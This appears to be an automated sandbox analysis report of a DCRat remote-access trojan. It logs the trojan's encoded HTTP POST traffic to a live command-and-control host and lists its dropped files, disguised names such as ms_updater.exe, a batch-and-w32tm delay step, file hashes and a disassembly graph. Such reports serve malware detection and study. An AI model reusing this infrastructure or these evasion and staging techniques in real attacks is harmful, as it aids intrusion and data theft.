Jul 3, 2024 15:52:06.253098011 CEST | 348 | OUT | POST /protecttrackDatalifePrivateCentral.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 118621cm.n9shteam2.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
Jul 3, 2024 15:52:06.608555079 CEST | 344 | OUT | Data Raw: 00 02 04 04 03 0d 04 07 05 06 02 01 02 04 01 0b 00 05 05 0c 02 06 03 0c 00 54 0e 54 04 53 03 53 0a 0e 07 0f 03 04 07 04 0b 04 05 06 05 04 05 52 05 07 0f 0e 0f 07 07 52 06 03 06 0d 04 04 06 0f 05 07 0d 0b 05 04 04 55 0e 52 0c 07 0f 01 0d 02 05 50
                                                    Data Ascii: TTSSRRURPSTU\L~pvO`bqaKsQRvYwBZhc^lcExNPD|mpActc\~u~V@@z}n}\a
Jul 3, 2024 15:52:06.824548006 CEST | 25 | IN | HTTP/1.1 100 Continue
Jul 3, 2024 15:52:07.419704914 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 13:52:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vr2HfW8qOsW6vGt%2BwA08C92fQKzVCPE7CAtva%2B34w%2FYv3DJ29B03aq%2Fwa044J8btHiEsgHzwGu4uoDgu0Bu8KPylY5MdASafkZU7NadNY6%2B6LnC35%2FAzWZKdEQbM5MmpOR%2BC0Dfj9RU5"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d75aa999ac15d7-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 35 32 38 0d 0a 56 4a 7e 01 6c 6d 56 5e 6c 71 78 4b 7c 61 6b 01 7d 67 7f 42 7f 70 7a 50 7b 63 5a 42 6a 72 7f 58 60 5d 54 52 6d 5f 69 4a 61 48 60 45 7d 61 78 01 55 4b 71 40 63 71 7f 03 7d 72 61 4d 68 64 75 54 6f 66 63 55 7e 5a 63 48 61 5c 79 07 77 58 76 5d 68 58 69 5c 7f 7c 67 55 7e 01 63 01 77 76 7b 06 7c 5c 54 5b 7e 06 62 5f 7b 59 5e 05 79 74 7c 05 6f 6e 63 00 6d 5b 7c 02 6f 5d 65 5b 7f 60 7b 5a 6c 77 5e 03 7e 5c 73 4d 75 61 59 59 7a 51 41 5b 7c 77 78 0b 7c 62 65 4e 77 7f 74 4e 6c 6c 5a 02 77 5e 75 54 79 61 6e 5c 69 52 7a 04 78 72 75 59 61 60 6c 5f 62 61 73 5f 63 72 7a 50 7e 5d 7a 06 77 62 6d 05 76 66 6c 09 6b 7f 75 00 60 6f 6b 5d 7c 73 6c 49 78 6f 7f 03 7b 5e 65 5b 7c 6d 6f 51 77 67 6f 5d 69 62 54 09 7d 6e 78 50 6c 43 7e 41 7e 04 7d 4e 7b 5d 46 51 7d 6f 6c 43 7e 60 59 53 7e 77 7a 00 6f 7e 67 01 79 72 74 4b 7c 4f 5a 5f 6a 5e 7b 42 7c 70 72 53 6d 60 74 01 7d 5c 5e 46 74 5d 71 51 7b 5c 79 02 75 48 60 06 7c 66 68 4f 7d 66 53 0d 77 62 6b 49 7c 4c 75 04 7f 67 58 0b 79 76 52 0b 7e 4d 59 03 76 72 61 02 74 [TRUNCATED]
                                                    Data Ascii: 528VJ~lmV^lqxK|ak}gBpzP{cZBjrX`]TRm_iJaH`E}axUKq@cq}raMhduTofcU~ZcHa\ywXv]hXi\|gU~cwv{|\T[~b_{Y^yt|oncm[|o]e[`{Zlw^~\sMuaYYzQA[|wx|beNwtNllZw^uTyan\iRzxruYa`l_bas_crzP~]zwbmvflku`ok]|slIxo{^e[|moQwgo]ibT}nxPlC~A~}N{]FQ}olC~`YS~wzo~gyrtK|OZ_j^{B|prSm`t}\^Ft]qQ{\yuH`|fhO}fSwbkI|LugXyvR~MYvratamH|_r~l`A}IsDuO{G{ba~^y{wp{YRMxSyblzc\L^Z{Ix|rQv_V~lIdqeAvlhx||HwpT@y_}~|vzqPuMoDu_dOwOT~pftL_uu^|SwB^MtI{|UJxpTK}mttYpAbf}mQB{mT}bqNtBZC~pt~wbN{SwKybhIOk|wo~`ezsZL}bdFts[OyOeJwfhK~Xx@fuw\U|\q|gX@xHp}ssHu\ava}H_~F}|p@~gcvOUH{r_I}NaxYRywt{CwHxbt{Mv{]
Jul 3, 2024 15:52:07.419821978 CEST | 689 | IN | Data Raw: 4e 5a 78 67 5d 5b 7c 61 64 5f 62 62 6c 04 6a 6f 67 06 7d 77 78 42 68 61 5f 0d 62 6c 5d 5d 6f 6c 52 02 63 73 6d 54 79 5f 71 47 7d 7f 66 5f 7a 5c 79 05 76 7f 78 42 61 07 67 78 5b 4c 7e 4a 78 59 61 5a 60 61 7e 58 75 4b 51 54 7f 52 6a 5c 60 6f 6b 58
                                                    Data Ascii: NZxg][|ad_bbljog}wxBha_bl]]olRcsmTy_qG}f_z\yvxBagx[L~JxYaZ`a~XuKQTRj\`okX]ZI{l]K{zkm|wwl~abzSYQ`q[QqBjwOSoR|cHWtaNQz{@\YYhbhYiYUk`[OmMR}\dcZbTnaX^bf]X|f|}HvQp\B{[TYPqJRe]HQ[Ibn~cmvx_\X{~ZKu_ExLuYwr]ldCT{o[W
Jul 3, 2024 15:52:07.447504044 CEST | 324 | OUT | POST /protecttrackDatalifePrivateCentral.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 118621cm.n9shteam2.top
                                                    Content-Length: 384
                                                    Expect: 100-continue
Jul 3, 2024 15:52:07.552268028 CEST | 25 | IN | HTTP/1.1 100 Continue
Jul 3, 2024 15:52:07.552495003 CEST | 384 | OUT | Data Raw: 5e 57 5d 5d 5d 58 50 54 5c 5f 55 57 57 54 50 59 57 55 5f 43 59 59 50 45 58 5e 5c 58 52 5e 55 57 5a 45 53 58 56 5d 56 57 5d 55 52 5e 5f 5a 55 53 50 53 59 5f 58 5a 50 5a 56 5f 53 59 59 59 5f 5a 5b 5c 58 5a 55 58 59 5d 58 5d 5c 5b 59 52 58 57 50 5c
                                                    Data Ascii: ^W]]]XPT\_UWWTPYWU_CYYPEX^\XR^UWZESXV]VW]UR^_ZUSPSY_XZPZV_SYYY_Z[\XZUXY]X]\[YRXWP\PRRXZXVURVYTWPYVZ_]X^T_Z]]^YF_X]UT\YV\XS][_YD^ZRVRW^XZG^XTVZ\WP\_]Q^_[[__Q_][V[QX__Y\WWGZQ_[T\]WY\^YZ\.Z3V/%#V$'=%4 8[<4:[&:;S<1<R%-$" W88"Y.$[,
Jul 3, 2024 15:52:07.848247051 CEST | 752 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 13:52:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYDYNTNHEhaufcPii7YtEmonyPiwkNTlPtYb%2F1xPTPP%2F0iRDclphq2%2BB9MkXLDPw8fjfG1rJQJiLUecG1BwKm7htJvVKElfw%2Fso6muHz9toWbm9Fa39%2FT5M5ZGZCYpInveeTE843SCMN"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d75aaedce515d7-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 39 38 0d 0a 0d 1f 22 59 20 05 0b 0f 21 02 37 54 2a 5e 39 00 2a 3b 39 41 27 2c 35 1b 32 3f 08 5c 3b 2f 23 19 26 27 20 5e 2b 12 08 0f 32 30 06 55 27 38 2a 51 03 1b 20 03 32 05 3a 11 28 00 02 5f 25 28 3a 01 31 3e 23 5b 2b 3a 23 10 20 06 3e 5c 30 0a 34 0b 2b 5f 32 51 2f 07 28 1a 2e 22 2a 0a 35 24 2d 54 0f 1f 20 5d 32 3c 24 56 22 0e 26 58 31 58 26 01 34 03 37 51 22 17 02 13 25 2f 3b 10 26 38 28 07 30 54 2c 5f 29 21 23 1f 28 05 28 0b 3c 3b 26 50 2f 01 23 52 01 34 5c 57 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98"Y !7T*^9*;9A',52?\;/#&' ^+20U'8*Q 2:(_%(:1>#[+:# >\04+_2Q/(."*5$-T ]2<$V"&X1X&47Q"%/;&8(0T,_)!#((<;&P/#R4\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.21.90.190 | 80 | 6768 | C:\Users\user\AppData\Roaming\ms_updater.exe

Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 15:52:08.243691921 CEST | 325 | OUT | POST /protecttrackDatalifePrivateCentral.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 118621cm.n9shteam2.top
                                                    Content-Length: 1536
                                                    Expect: 100-continue
Jul 3, 2024 15:52:08.592216015 CEST | 1536 | OUT | Data Raw: 5b 52 58 5f 58 5b 50 55 5c 5f 55 57 57 5b 50 5a 57 5c 5f 44 59 5b 50 47 58 5e 5c 58 52 5e 55 57 5a 45 53 58 56 5d 56 57 5d 55 52 5e 5f 5a 55 53 50 53 59 5f 58 5a 50 5a 56 5f 53 59 59 59 5f 5a 5b 5c 58 5a 55 58 59 5d 58 5d 5c 5b 59 52 58 57 50 5c
                                                    Data Ascii: [RX_X[PU\_UWW[PZW\_DY[PGX^\XR^UWZESXV]VW]UR^_ZUSPSY_XZPZV_SYYY_Z[\XZUXY]X]\[YRXWP\PRRXZXVURVYTWPYVZ_]X^T_Z]]^YF_X]UT\YV\XS][_YD^ZRVRW^XZG^XTVZ\WP\_]Q^_[[__Q_][V[QX__Y\WWGZQ_[T\]WY\^YZ\-$ ']&]7T%'B=%$")8_<$12*+2 W2X<#70;8"Y.$[,
Jul 3, 2024 15:52:08.710963011 CEST | 25 | IN | HTTP/1.1 100 Continue
Jul 3, 2024 15:52:09.081466913 CEST | 756 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 13:52:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Al%2FYMVMYrMnM4AmmWOz6X6dCTvGRC17qRuwrxgNchYRSRx71E9McycuMMLZR8HDo9gUzEU%2FVVD1z%2B%2BmyVDcrHaUCAum28UyTW%2F%2Fu%2BuveEUEzeUlDD0gN3qXRU4w9mRi2pV5qSDKryZF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d75ab62e0b6a5e-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 39 38 0d 0a 0d 1f 22 5d 37 02 35 0e 22 2b 2c 0b 2a 2b 35 01 29 16 0f 0a 27 11 36 0b 24 3c 3e 59 2c 3c 2b 51 30 1a 23 06 2b 12 07 1a 31 20 06 56 27 38 2a 51 03 1b 23 18 31 3b 3a 1e 2a 3e 37 02 30 28 21 5d 31 5b 38 07 2b 39 27 59 20 2b 29 07 33 33 2b 57 28 5f 32 1f 2f 07 01 01 3a 32 2d 1f 35 34 2d 54 0f 1f 23 05 24 2f 0e 1c 35 0e 3a 5b 26 3e 39 13 34 2a 30 0f 20 39 34 59 26 3f 23 5e 27 28 23 59 33 22 2c 59 2b 32 24 04 2b 2c 27 52 3f 01 26 50 2f 01 23 52 01 34 5c 57 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98"]75"+,*+5)'6$<>Y,<+Q0#+1 V'8*Q#1;:*>70(!]1[8+9'Y +)33+W(_2/:2-54-T#$/5:[&>94*0 94Y&?#^'(#Y3",Y+2$+,'R?&P/#R4\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 104.21.90.190 | 80 | 6768 | C:\Users\user\AppData\Roaming\ms_updater.exe

Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 15:52:08.245197058 CEST | 349 | OUT | POST /protecttrackDatalifePrivateCentral.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 118621cm.n9shteam2.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
Jul 3, 2024 15:52:08.592111111 CEST | 1056 | OUT | Data Raw: 5b 55 5d 5f 58 5a 50 5c 5c 5f 55 57 57 5e 50 51 57 5a 5f 48 59 52 50 48 58 5e 5c 58 52 5e 55 57 5a 45 53 58 56 5d 56 57 5d 55 52 5e 5f 5a 55 53 50 53 59 5f 58 5a 50 5a 56 5f 53 59 59 59 5f 5a 5b 5c 58 5a 55 58 59 5d 58 5d 5c 5b 59 52 58 57 50 5c
                                                    Data Ascii: [U]_XZP\\_UWW^PQWZ_HYRPHX^\XR^UWZESXV]VW]UR^_ZUSPSY_XZPZV_SYYY_Z[\XZUXY]X]\[YRXWP\PRRXZXVURVYTWPYVZ_]X^T_Z]]^YF_X]UT\YV\XS][_YD^ZRVRW^XZG^XTVZ\WP\_]Q^_[[__Q_][V[QX__Y\WWGZQ_[T\]WY\^YZ\.]%0#2;'$$$C+5?^"*<)$=&:8+2'$=/5<,8"Y.$[,
Jul 3, 2024 15:52:08.691548109 CEST | 25 | IN | HTTP/1.1 100 Continue
Jul 3, 2024 15:52:09.044270039 CEST | 595 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 13:52:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ge%2BWcAS4H6gUWumqy0O6H50dJHFXONdZBawvZmio0NhQw4ZSB6pvf3f4JCWW6drZV7Rs66P50HSG8Yl7wrOuzz6CMshL9ItubWn2nBmBw7pw2SM8OSbXWLvSFJZhi2ZdG1lfcg5MLIJE"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d75ab608881a28-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 34 0d 0a 3f 57 5b 51 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4?W[Q0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49735 | 104.21.90.190 | 80 | 6768 | C:\Users\user\AppData\Roaming\ms_updater.exe

Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 15:52:08.983047962 CEST | 327 | OUT | POST /protecttrackDatalifePrivateCentral.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 118621cm.n9shteam2.top
                                                    Content-Length: 184204
                                                    Expect: 100-continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49736 | 104.21.90.190 | 80 | 6768 | C:\Users\user\AppData\Roaming\ms_updater.exe

Timestamp | Bytes transferred | Direction | Data
Jul 3, 2024 15:52:09.197371960 CEST | 325 | OUT | POST /protecttrackDatalifePrivateCentral.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 118621cm.n9shteam2.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue


                                                    Target ID:0
                                                    Start time:09:52:02
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\1hibLFnCm1.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\1hibLFnCm1.exe"
                                                    Imagebase:0xf50000
                                                    File size:906'240 bytes
                                                    MD5 hash:2196EDD4AD9D7E8CA345339A66E2FED5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:09:52:03
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\AppData\Roaming\ms_tool.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\ms_tool.exe"
                                                    Imagebase:0x7ff68c5e0000
                                                    File size:18'944 bytes
                                                    MD5 hash:F3EDFF85DE5FD002692D54A04BCB1C09
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:09:52:03
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:09:52:03
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\ms_updater.exe"
                                                    Imagebase:0xd90000
                                                    File size:640'512 bytes
                                                    MD5 hash:CEAC3DE237F6B1DC4B279D8E5F5B3689
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000003.00000000.1699967680.0000000000D92000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000003.00000002.1759262008.000000000314B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\ms_updater.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 88%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:09:52:08
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat"
                                                    Imagebase:0x7ff78c3f0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:09:52:08
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:09:52:09
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\chcp.com
                                                    Wow64 process (32bit):false
                                                    Commandline:chcp 65001
                                                    Imagebase:0x7ff696430000
                                                    File size:14'848 bytes
                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:09:52:09
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\w32tm.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                    Imagebase:0x7ff65dea0000
                                                    File size:108'032 bytes
                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                      Execution Graph

                                                      Execution Coverage:6%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:4.5%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:86
20445 f60cbc 20443->20445 20446 f60d12 20444->20446 20449 f61db3 _Fputc 44 API calls 20444->20449 20445->20446 20447 f60e37 20445->20447 20448 f60ea8 20445->20448 20446->20393 20452 f60ed5 20447->20452 20453 f60e3d 20447->20453 20450 f60ead 20448->20450 20451 f60efb 20448->20451 20454 f60d07 20449->20454 20455 f60eef 20450->20455 20456 f60eaf 20450->20456 20451->20452 20459 f60e7a 20451->20459 20476 f60e5f 20451->20476 20551 f6014d 20452->20551 20453->20459 20462 f60e43 20453->20462 20454->20393 20462->20476 20478 f60e37 20477->20478 20479 f60ea8 20477->20479 20482 f60ed5 20478->20482 20483 f60e3d 20478->20483 20480 f60ead 20479->20480 20481 f60efb 20479->20481 20484 f60eef 20480->20484 20485 f60eaf 20480->20485 20481->20482 20490 f60e7a 20481->20490 20504 f60e5f 20481->20504 20486 f6014d 45 API calls 20482->20486 20483->20490 20491 f60e43 20483->20491 20489 f614c9 45 API calls 20484->20489 20487 f60eb4 20485->20487 20488 f60e51 20485->20488 20486->20504 20487->20482 20493 f60eb9 20487->20493 20492 f61209 47 API calls 20488->20492 20488->20504 20505 f60e73 20488->20505 20489->20504 20495 f602ca 45 API calls 20490->20495 20490->20505 20491->20488 20494 f60e8f 20491->20494 20491->20504 20492->20504 20499 f61393 46 API calls 20494->20499 20494->20505 20495->20504 20499->20504 20500 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20503 f6a120 _Fputc 46 API calls 20503->20504 20504->20503 20504->20505 20505->20500 20507 f61672 20506->20507 20509 f616dc 20506->20509 20508 f68c78 _Ungetc 44 API calls 20507->20508 20510 f61679 20508->20510 20509->20432 20510->20509 20511 f61f44 __dosmaperr 14 API calls 20510->20511 20512 f616d1 20511->20512 20513 f61e30 _Ungetc 44 API calls 20512->20513 20513->20509 20515 f615dd 20514->20515 20516 f6955e 20514->20516 20518 f695a5 20515->20518 20516->20515 20517 f719e5 __Getctype 44 API calls 20516->20517 20517->20515 20523 f6160b std::_Locinfo::_Locinfo_ctor 44 API calls 20522->20523 20524 f5fdb5 20523->20524 
20525 f5fdca 20524->20525 20528 f5fdfd 20524->20528 20531 f5fde5 std::_Locinfo::_Locinfo_ctor 20524->20531 20552 f60161 20551->20552 20600 f57139 20599->20600 20631 f5a6f5 20600->20631 20604 f57002 20605 f52370 InitOnceBeginInitialize 20604->20605 20606 f52396 20605->20606 20607 f523e2 20605->20607 20608 f523ce 20606->20608 20610 f523b1 InitOnceComplete 20606->20610 20637 f5b10d EnterCriticalSection 20606->20637 20609 f5f7b3 __purecall 44 API calls 20607->20609 20611 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 20608->20611 20609->20606 20610->20608 20616 f52416 20610->20616 20612 f523de 20611->20612 20612->20235 20614 f523f1 20614->20610 20642 f5b44f 20614->20642 20616->20235 20699 f55d00 20620->20699 20622 f571ce 20710 f57230 20622->20710 20628 f5705f 20627->20628 20628->20236 20629 f584bf CoGetObjectContext 20628->20629 20630 f584d2 20629->20630 20630->20236 20636 f5a4b2 InitializeConditionVariable 20631->20636 20633 f57144 20634 f58a79 20633->20634 20635 f589d3 InitializeConditionVariable 20634->20635 20635->20604 20636->20633 20638 f5b121 20637->20638 20639 f5b126 LeaveCriticalSection 20638->20639 20650 f5b195 20638->20650 20639->20614 20655 f5b422 20642->20655 20645 f5b0c3 EnterCriticalSection LeaveCriticalSection 20646 f5b15f 20645->20646 20651 f5b1a3 SleepConditionVariableCS 20650->20651 20652 f5b1bc LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 20650->20652 20653 f5b1e0 20651->20653 20652->20653 20653->20638 20656 f5b431 20655->20656 20657 f5b438 20655->20657 20661 f66f9a 20656->20661 20664 f67017 20657->20664 20660 f52407 20660->20645 20662 f67017 47 API calls 20661->20662 20663 f66fac 20662->20663 20663->20660 20667 f66d63 20664->20667 20668 f66d6f __FrameHandler3::FrameUnwindToState 20667->20668 20675 f61f98 EnterCriticalSection 20668->20675 20670 f66d7d 20675->20670 20700 f55d27 20699->20700 20701 f55d9c codecvt 20699->20701 20702 f55d33 20700->20702 20703 f55e19 20700->20703 20701->20622 20705 f55e1e 
20702->20705 20706 f55d74 codecvt 20702->20706 20744 f56550 20703->20744 20707 f61e40 std::ios_base::_Init 44 API calls 20705->20707 20729 f56560 20706->20729 20709 f55e23 20707->20709 20711 f5725d 20710->20711 20774 f55420 20711->20774 20730 f565d6 20729->20730 20731 f56570 20729->20731 20747 f513c0 20730->20747 20733 f565a9 20731->20733 20734 f5657b 20731->20734 20734->20730 20761 f58cdc 20744->20761 20748 f513cb codecvt 20747->20748 20766 f58c73 20761->20766 20769 f51260 20766->20769 20770 f5be7b ___std_exception_copy 45 API calls 20769->20770 20775 f55435 20774->20775 21400 f651c1 21399->21400 21401 f651af 21399->21401 21411 f6504a 21400->21411 21426 f6524a GetModuleHandleW 21401->21426 21406 f5afdd 21406->19322 21412 f65056 __FrameHandler3::FrameUnwindToState 21411->21412 21434 f61f98 EnterCriticalSection 21412->21434 21414 f65060 21435 f65097 21414->21435 21416 f6506d 21439 f6508b 21416->21439 21419 f65219 21464 f6528d 21419->21464 21422 f65237 21424 f652af std::locale::_Setgloballocale 3 API calls 21422->21424 21423 f65227 GetCurrentProcess TerminateProcess 21423->21422 21425 f6523f ExitProcess 21424->21425 21427 f651b4 21426->21427 21427->21400 21428 f652af GetModuleHandleExW 21427->21428 21429 f652ee GetProcAddress 21428->21429 21430 f6530f 21428->21430 21429->21430 21431 f65302 21429->21431 21432 f65315 FreeLibrary 21430->21432 21433 f651c0 21430->21433 21431->21430 21432->21433 21433->21400 21434->21414 21437 f650a3 __FrameHandler3::FrameUnwindToState 21435->21437 21436 f6510a std::locale::_Setgloballocale 21436->21416 21437->21436 21442 f66fb0 21437->21442 21463 f61fe0 LeaveCriticalSection 21439->21463 21441 f65079 21441->21406 21441->21419 21443 f66fbc __EH_prolog3 21442->21443 21446 f66d08 21443->21446 21445 f66fe3 std::locale::_Init 21445->21436 21447 f66d14 __FrameHandler3::FrameUnwindToState 21446->21447 21454 f61f98 EnterCriticalSection 21447->21454 21449 f66d22 21455 f66ec0 21449->21455 21454->21449 21456 f66d2f 21455->21456 21457 f66edf 
